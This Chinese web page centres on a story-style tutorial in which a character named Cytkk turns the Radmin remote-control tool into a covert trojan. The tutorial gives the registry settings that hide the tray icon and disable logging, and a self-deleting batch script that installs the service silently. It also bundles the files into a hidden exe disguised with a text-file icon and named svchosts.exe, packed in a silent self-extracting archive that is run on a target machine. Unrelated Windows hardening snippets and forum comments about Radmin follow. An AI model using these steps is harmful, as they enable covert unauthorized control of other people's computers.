Radmin影子版3.2的設(shè)置教程
想到這些,Cytkk眉頭微皺,但憑借著多年的技術(shù)敏銳感,一款改造后的Radmin服務(wù)端形象出現(xiàn)在腦海里,一個完美的木馬后門:服務(wù)端由單一EXE文件組成,運行后無明顯痕跡、無需人工干涉即可自動填寫注冊信息到注冊表,添加自身到系統(tǒng)服務(wù)啟動項......Cytkk就這么一邊構(gòu)想著,一邊將鼠標移到了自己電腦的"開始"菜單上......
改造Radmin
1.Cytkk決定先去除Radmin在服務(wù)端運行后的任務(wù)欄標志。進入Radmin"服務(wù)端設(shè)置"中的"設(shè)置參數(shù)"(見圖1),在"隱藏狀態(tài)欄圖標"前打上√,這樣原本在服務(wù)端運行后會在狀態(tài)欄有圖標的弊端就剔除了。
2.然后根據(jù)自己的需要,更改連接端口號,設(shè)置成不常用的1986端口。其它地方可不作修改(值得注意的是"日志"選項,千萬不要因為錯選"保留記錄文件"從而留下"罪證"),點擊"確定"退出。
3.點選"設(shè)置密碼"來設(shè)置連接時的密碼******。
4.一切設(shè)置妥當(dāng)后,Cytkk先在自己機子上安裝了服務(wù)(因為Radmin工作原理的特殊性,配置信息并非記錄在服務(wù)端程序內(nèi),而是在相關(guān)的注冊表鍵值內(nèi))。待軟件提示成功安裝服務(wù)后,Cytkk打開注冊表編輯器,找到:HKEY_LOCAL_MACHINE\SYSTEM\RAdmin 鍵值,點擊"導(dǎo)出注冊表"并保存成單獨的r_server.reg文件,用記事本打開后,發(fā)現(xiàn)其中內(nèi)容如下(根據(jù)設(shè)置的不同,參數(shù)會略有出入):
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTE
M\RAdmin]
[HKEY_LOCAL_MACHINE\SYSTE
M\RAdmin\v2.0]
[HKEY_LOCAL_MACHINE\SYSTE
M\RAdmin\v2.0\Server]
[HKEY_LOCAL_MACHINE\SYSTE
M\RAdmin\v2.0\Server\iplist]
[HKEY_LOCAL_MACHINE\SYSTE
M\RAdmin\v2.0\Server\Parameters]
"NTAuthEnabled"=hex:00,00,00,00
"Parameter"=hex:9c,ee,06,f2,9b,05,13,f8,6e,66,9a,06,00,24,5b,4b(這里是連接密碼!其它信息不影響操作,所以不需要掌握)
"Port"=hex:c2,07,00,00(連接服務(wù)端時用的端口)
"Timeout"=hex:0a,00,00,00
************************
"LogFilePath"="c:\\logfile.txt"
"FilterIp"=hex:00,00,00,00
"DisableTrayIcon"=hex:01,00,00,00(01表示隱藏系統(tǒng)右下角的圖標,如改成00圖標就會被顯示)
"AutoAllow"=hex:00,00,00,00
"AskUser"=hex:00,00,00,00
"EnableEventLog"=hex:00,00,00,00
5.最后Cytkk麻利地在桌面新建了一個setup.bat批處理文件,在里面添加如下腳本:
@echo off
***********************?(自動安裝Radmin服務(wù)端)
regedit.exe -s %SystemRoot%\system32\r_server.reg >nul (自動將r_server.reg內(nèi)的配置信息導(dǎo)入目標機注冊表)
net start r_server >nul (啟動r_server服務(wù)端服務(wù))
*******************************(刪除信息文件)
del %0
注意:文中代碼后括號內(nèi)的內(nèi)容為注釋,勿輸入。
超級捆綁
由于Radmin并不是"木馬型"監(jiān)控軟件,所以它的服務(wù)端是由r_server.exe、raddrv.dll、AdmDll.dll三個文件組成,而一般的"木馬"服務(wù)端通常只有一個可執(zhí)行文件。這是個比較麻煩的硬傷,但這難不倒Cytkk,他熟練地運行了一款名為"超級捆綁"的軟件。
1.在界面點擊右邊白色圖標,將Radmin服務(wù)端的三個文件添加進文件列表,捆綁方式設(shè)置成"按文件捆綁方式",然后點擊右邊的"高級"按鈕進入詳細設(shè)置,在"常規(guī)"選項內(nèi)(圖2),將圖標自定義為一個文本文件以增加更好的隱蔽性,文件大小則采用默認。
2.隨后,Cytkk又將"屬性"中的"只讀"、"隱藏"和"系統(tǒng)"三項全部選中,這樣就使捆綁后的文件更具隱蔽和安全性。
3.Cytkk點擊"運行"標簽,出現(xiàn)捆綁程序運行設(shè)置,將文件分解運行目錄設(shè)置成 "在捆綁后的文件所在目錄中運行",窗口狀態(tài)則設(shè)為"隱藏窗口"。
4.他將"參數(shù)"頁面內(nèi)的全部個性化設(shè)置選項前面的√取消。點擊"確定"退回上級窗口,最后設(shè)置好捆綁文件輸出路徑。為了增強隱蔽性,可以將捆綁后的執(zhí)行文件更名,Cytkk將它命名為svchosts.exe。
5.點擊"合并"就完成了服務(wù)端的文件捆綁工作。現(xiàn)在的Radmin已經(jīng)基本上從一款商業(yè)化的遠程控制軟件變成了一個不折不扣的木馬了。
善后
到此,Cytkk認為整個改造工作差不多完成了,馬上進行關(guān)鍵的收尾工作,即將編輯好的setup.bat以及最先導(dǎo)出的r_server.reg連同捆綁后的svchosts.exe這三個文件用WinRAR打包成自解壓程序。
Cytkk進行了如下設(shè)置:在"高級自釋放選項"中的"常規(guī)"選項內(nèi)釋放路徑一欄填入"%systemroot%\system32,在"釋放后運行"里則需要把setup.bat(注意填寫文件擴展名)寫上,這樣在解壓后才會自動執(zhí)行該批處理程序(如圖3)。在"模式"選項里,把第一個模式設(shè)置成"全部隱藏",覆蓋方式設(shè)置成"跳過現(xiàn)有文件",最后將"自釋放模塊"設(shè)置成DOS.SFX的DOS命令行RAR自釋放格式(因為取得系統(tǒng)CMD Shell后默認的Windows圖形控制臺不能正常工作)。點擊"確定"完成收尾工作。Cytkk最后檢查了一下RAR自釋放包內(nèi)的注釋(右邊灰色窗口內(nèi)),看到自解壓腳本如下:
Path=%systemroot%\system32
**************
Silent=1
Overwrite=2
所有工作已經(jīng)完成,Cytkk滿意地笑了笑,將制作好的打包程序上傳到目標計算機運行,隨后在自己機子上打開Radmin的客戶端,輸入目標機IP→連接→輸入密碼
更改XP下的administrator權(quán)限
首先,Administrator這個用戶是XP系統(tǒng)必須存在的。你如果想在不更改用戶的情況下將權(quán)限降下來。應(yīng)該說是不可能的。有一種方法你可以嘗試一下。要求盤符格式必須是NTFS的。右擊盤符,點“屬性”。上面有個“安全”選項。在里面你會看見所有用戶對這個盤符所擁有的權(quán)利。你可以把administrator這個用戶的權(quán)限更改...
能否從進程上看是否被Radmin影子版遠程監(jiān)控?怎么看?
進程文件: inetinfo or inetinfo.exe進程名稱: IIS Admin Service Helper描述: InetInfo是Microsoft Internet Infomation Services (IIS)的一部分,用于Debug調(diào)試除錯。【msftpsvc,w3svc,iisadmn】常見錯誤: N\/A是否為系統(tǒng)進程: 是internat - internat.exe - 進程信息進程文件: internat or internat.exe進程名稱: Input ...
如何設(shè)置啟動密碼及其破解找回
備份密鑰的方法是:單擊“開始”→“運行”,輸入:certmgr.msc,回車后打開“證書管理器”,在 “當(dāng)前用戶”→“個人”→“證書”目錄下,右擊頒發(fā)給你的證書,在“所有任務(wù)”中點擊“導(dǎo)出”,并選擇Export The Private Key(導(dǎo)出私鑰),其它選項按照默認設(shè)置。輸入該用戶的密碼和保存路徑就可以了。 在重裝系統(tǒng)后,照舊...
win 2008 通過遠程桌面容易入侵嗎?
首先以系統(tǒng)管理員權(quán)限登錄進入Windows Server 2008服務(wù)器系統(tǒng),依次單擊“開始”\/“運行”命令,打開系統(tǒng)運行文本框,在其中輸入“gpedit.msc”字符串命令,單擊“確定”按鈕,打開組策略編輯控制臺窗口; 其次在該控制臺窗口的左側(cè)顯示區(qū)域中,將鼠標定位于“計算機配置”分支選項上,再從該分支下面依次展開“管理模板”\/“網(wǎng)...
不安殺毒軟件的朋友是規(guī)則如何設(shè)置的??滿意的話加100分!!
2、在控制面板中打開"用戶帳號",將Administrator修改密碼,盡量復(fù)雜些,不一定要記得.再創(chuàng)建一個計算機管理員用戶和受限用戶,管理員用戶一定要密碼,且也要復(fù)雜一些,這個密碼要記住.因為以后裝軟件,游戲要用上.當(dāng)然,記不住可以在DOS下改. 3、設(shè)置好后,進入創(chuàng)建的計算機管理員用戶,打開“我的電腦”,單擊“工具”——...
海康威視電瓶車檢測警戒安裝配置方法圖解教程
攝像機配置方法1)網(wǎng)頁訪問 在瀏覽器地址欄中輸入網(wǎng)絡(luò)攝像機修改后的IP地址進行登錄,輸入管理員賬號admin及激活時設(shè)置的密碼,即可登錄系統(tǒng) 網(wǎng)頁登錄界面 2)安裝插件 首次登錄系統(tǒng),預(yù)覽界面中會提示安裝瀏覽器控件,請點擊安裝。插件安裝 3)開啟設(shè)備的規(guī)則信息和pos信息疊加 進入配置-本地,將規(guī)則信息及...
郵件服務(wù)器
FMS的安裝過程比較簡單,這里不再贅述,我們重點談?wù)勊脑O(shè)置過程。 一、設(shè)置域名和管理員口令 程序安裝完畢后,自動進入設(shè)置向?qū)А螕簟跋乱徊健卑粹o,即可進入“應(yīng)用程序設(shè)置”窗口。在這里我們可以設(shè)置用戶信箱的域名(即用戶E-mail地址中@字符的后綴部分)和管理員口令。您可以向域名管理機構(gòu)申請合法的域名。但是如果...
網(wǎng)站域名無法打開,出現(xiàn)"Bad Request (Invalid Hostname)"如何解決...
方法是: 控制面板 -> 管理工具 -> Internet 信息服務(wù)(IIS)管理器,選取站點,右鍵 ->屬性 ->主目錄 ->配置 -> 選項-> 啟動父路徑。 19、修改最大上傳值: 找到windows\\system32\\inesrv\\下的metabase.xml,打開,找到ASPMaxRequestEntityAllowed 把他修改為需要的值,然后重啟iis admin service服務(wù)。 bad request...
主機還要做安全設(shè)置嗎
1,系統(tǒng)盤要選擇好,能正版盡量正版,當(dāng)然盜版的要去正規(guī)的網(wǎng)站下載,從而減少源系統(tǒng)捆綁木馬的可能性。2,裝好系統(tǒng),設(shè)置好密碼,刪除admin$,ipc$等共享,并停止或刪除一切不必要的服務(wù),并打全所有的補丁。3,盡量安裝殺毒軟件防火墻,現(xiàn)在免費的可以升級的很多。4,第三方軟件漏洞問題,現(xiàn)在第三方軟件...
相關(guān)評說:
安達市正等: ______ 家里的電腦?你是要和外界連,還是家里的兩臺機子互連?外界連的話,有點麻煩.因為.要固定IP.或者綁定動態(tài)域名.如果家里的話兩臺機子互連的話.首先,你看是不是用交換機互連好了?或者是路由器連接 然后.你安裝radmin的時候的端口是不是對應(yīng)的.另外還有就是.你要在防火墻里添加這個端口,或者關(guān)了.不然系統(tǒng)會自動阻也會導(dǎo)致連接不上!
安達市正等: ______ 只在局域網(wǎng)內(nèi)使用影子的話,就不需要在路由上進行端口映射了.使用radmin進行相關(guān)設(shè)置(端口,密碼等參數(shù)).如有疑問,空間留言或跟帖均可.
安達市正等: ______ Radmin影子版,可以遠程控制你的計算機,你可以在本地看見遠程計算機的屏幕顯示,本地的鼠標、鍵盤的有關(guān)反應(yīng)也會傳送到遠程計算機. 它有以下特點: 1.運行速度快. 2.Radmin支持被控端以服務(wù)的方式運行、支持多個連接和IP 過濾(...
安達市正等: ______ 被控機裝完服務(wù)后需要重啟動一次 ,你的網(wǎng)絡(luò)是內(nèi)網(wǎng)ip 能不能ping通 ,排除網(wǎng)絡(luò)故障.被控機是不是有防火墻屏蔽了影子,換個端口試下.
安達市正等: ______ radmin 分2部分 被控制機 和 控制機 Radmin Viewer是控制機裝的 Radmin Server是被控制機裝的 網(wǎng)上有個Radmin影子版(有些可能被放了木馬),用起來也很簡單 以Radmin影子版為例 在局域網(wǎng)的環(huán)境下.Radmin Server 的三個文件(三個文件名字忘記了好像是2個DLL文件和1個EXE文件) 放在被控制機的任何文件夾里 把EXE文件放在 開機-啟動(哪里用快鍵方式).被控制機的IP設(shè)置為 192.168.1.2 Radmin Viewer 開起來就行了 在軟件里把IP地址(192.168.1.2)填進去.最好用默認的端口不然改起來會很麻煩.控制機的IP設(shè)置為 192.168.1.1
安達市正等: ______ [watermark]首先當(dāng)然是安裝RADMIN了,這個很簡單,網(wǎng)上有影子版3.0,是漢化的,我用的就是它.其它版本的使用方式都是一樣的. 在這可以下載到: http://jfsky.com/SoftView/SoftView_2688.html 由于為了安全使用,讓用被控端安全的被控...
安達市正等: ______ 內(nèi)網(wǎng)的服務(wù)端口一律統(tǒng)一為10086 端口. 做外網(wǎng)映射的時候,如果只做一臺機映射,則外網(wǎng)端口是10086. 如果有多臺機同時做映射的話,則外網(wǎng)端口一律統(tǒng)一為 5+網(wǎng)段編號+IP號 比如: 內(nèi)網(wǎng)地址 內(nèi)網(wǎng)端口 外網(wǎng)端口 作用 192.168.1.10 10086 ...
安達市正等: ______ 有現(xiàn)成的服務(wù)端生成器,端口就是你和被控連接時候的TCP控制端口,1-65536都成,別和現(xiàn)有的端口重復(fù)了,服務(wù)名稱就是在任務(wù)管理器服務(wù)那里面顯示的服務(wù)名稱,描述也差不多,就是描述這個服務(wù)是干什么的,連接密碼是你自己隨便設(shè)定...
安達市正等: ______ 影子版不好用,而且radmin有的時候?qū)irect3D和openGL有“抵觸心里”,顯示的是黑的,你最好還是用pcanywhere之類的.
安達市正等: ______ 是的.但是如果是從外網(wǎng)連接的話,就需要映射端口
